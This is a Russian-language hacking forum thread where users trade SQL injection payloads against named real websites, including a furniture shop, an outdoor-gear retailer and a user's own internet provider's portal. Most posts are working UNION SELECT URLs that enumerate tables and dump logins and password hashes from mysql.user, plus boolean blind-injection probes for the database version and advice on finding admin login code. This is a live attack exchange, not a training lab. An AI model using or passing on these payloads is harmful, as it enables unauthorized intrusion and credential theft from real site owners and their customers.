Ваши вопросы по уязвимостям.

http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11+from+information_schema.tables/*

что не подставляю, возвращает ошибку с mysql_num_rows(),версию базу и т.д узнать почемуто можно)(

 

Велемир я тебе сказал искать конфиги или исходники авторизации админки. Путь у тебя есть, собрать до нужного файла легко

http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,version(),2,3,4,5,6,7,8,9,10,11/*

откдуа ты там схему запрашиваешь, ветка старая, информатион_схема только с 5ой ветке

 

Версия mysql 4.1.22, там нету базы information_schema

 

Сорь...не знал,*пошёл дальше рыскать*

 

Ну чтож почти научился SQL инекций) вот токо у меня не получается вывеси логин с хэшем вот например это портал нашего провайдреа

Code:

http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*

Ну это покажет версию, базу и имя, вот я подставлял потом такое значение

Code:

http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,user,password,6,7,8+from+mysql.user/*

Токо не пошло, можете обяснить что подставить надо? Статьи прочитал подставлял не полуличось, либо я не понял)

 

CaNNabi$
union select 1,2,3,4,user,6,7,8 from mysql.user/*
либо так
union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*

 

Спасибо)

 

Это сработает, если есть доступ к бд mysql, если его нет - проходим лесом))

 

Invalid Query: select * from item where item_id = -256 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/* && inactive = 'N' Error is: You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2' at line 2

Выдало ошибку, после того как я подобрал количество столбцов:

http://www.site.com/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*

Всё прально ведь,а выдал ошибку (

 

линку довай

 

http://www.brunton.com/product.php?id=-256+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34/*

 

http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1)=3
там мускул третий, в нем нет конструкции union select

 

ых, кто бы мог подумать)

 

Ж)))ы откуад ты это взял всякие енд:РРР. Лан пасибо всем :Р

 

Чет я не фкурил, а где там версия отображается?))

 

Велемир, ну ты жжешь, она и не должна отображаться просто если выражение substring(version(),1,1 )=3 правильное, то отображается страница http://www.brunton.com/product.php?id=256 , а если нет, то страница не отобразится, попробуй
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=4
http://www.brunton.com/product.php?id=256%20and%20substring(version(),1,1 )=5

 

Откуда мне знать-то,впервые вижу такое )).С какой статьи взял?:Р

 

Warning: mysql_connect() [function.mysql-connect]: User 'u70382875' has exceeded the 'max_user_connections' resource (current value: 5) in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/includes/include.php on line 104

Warning: mysql_query() [function.mysql-query]: in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/product.php on line 10

Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /mnt/w0605/d00/s33/b027a354/www/eipcprograms.com/product.php on line 10
There has been an error in the database (queryDatabase; SELECT * FROM EIPC_PRODUCT WHERE ID=-16 union select 1,gangsta,3,4,5,6,7,8,9,10,11,12,13*;

Ваще жесть)))).Только только дошёл до таблицы,и вылетела ошибка.Не совсем понял,че произошло,разъясните ктонить:Р

 

Сорь,нашёл статью по работе с третьей весии скуля,щас примемся за обучение:Р

 

http://www.eipcprograms.com/product.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+limit+1,1/*

Да вродь нет(